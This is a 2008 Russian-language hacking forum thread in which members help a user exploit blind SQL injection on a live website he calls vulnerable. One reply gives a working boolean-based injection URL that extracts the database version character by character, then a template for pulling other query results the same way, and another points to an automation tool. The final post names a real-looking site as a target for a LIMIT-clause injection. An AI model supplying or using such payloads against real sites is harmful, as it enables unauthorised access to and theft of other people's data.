помогите составить запрос !

Discussion in 'Песочница' started by stigmatus, 19 Jun 2008.

  1. stigmatus

    stigmatus New Member

    Joined:
    26 Apr 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    -20
    есть бажнии саит ! слепая sql injection!

    пример :

    резулитат : TRUE

    а если :

    резулитат : FALSE

    почему ????

    читал статию http://injection.rulezz.ru/mysql_char_brute.html но чёта не как там описано ! help!
     
  2. spider-intruder

    spider-intruder Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    700
    Likes Received:
    339
    Reputations:
    37
    потому что код 5ки во втором запросе должен быть 53

    http://*******/concurs.php?id=4+AND+ascii(lower(substring(version (),1,1)))=53

    Ты приводиш первый символ значения переменной version() к типу ASCII т.е. к ее коду а он равен 53
     
    #2 spider-intruder, 19 Jun 2008
    Last edited: 19 Jun 2008
  3. stigmatus

    stigmatus New Member

    Joined:
    26 Apr 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    -20
    посиба ! подскажи как составить запрос типа : SELECT table_name from information_schema.tables
     
  4. stigmatus

    stigmatus New Member

    Joined:
    26 Apr 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    -20
    на том же примере ???
     
  5. spider-intruder

    spider-intruder Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    700
    Likes Received:
    339
    Reputations:
    37
    http://*******/concurs.php?id=4+AND+ascii(lower(substring("ЗАПРОС",1,1)))="ПЕРЕБИРАТЬ каждую букву методом схождения"

    гдето есть софт для автоматизации процесса даже по слепой инъекции - ищите.
    мне некогда )
     
  6. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,190
    Reputations:
    430
    Bsqlbf2
    _https://forum.antichat.ru/threadnav20879-1-10.html
     
    #6 Ch3ck, 19 Jun 2008
    Last edited: 19 Jun 2008
  7. XJIOP

    XJIOP Elder - Старейшина

    Joined:
    23 Mar 2005
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    народ что можно сдеалть с ошибкой в LIMIT? вот пример где ошибка http://mybits.ws:80/browse.php?page=0.01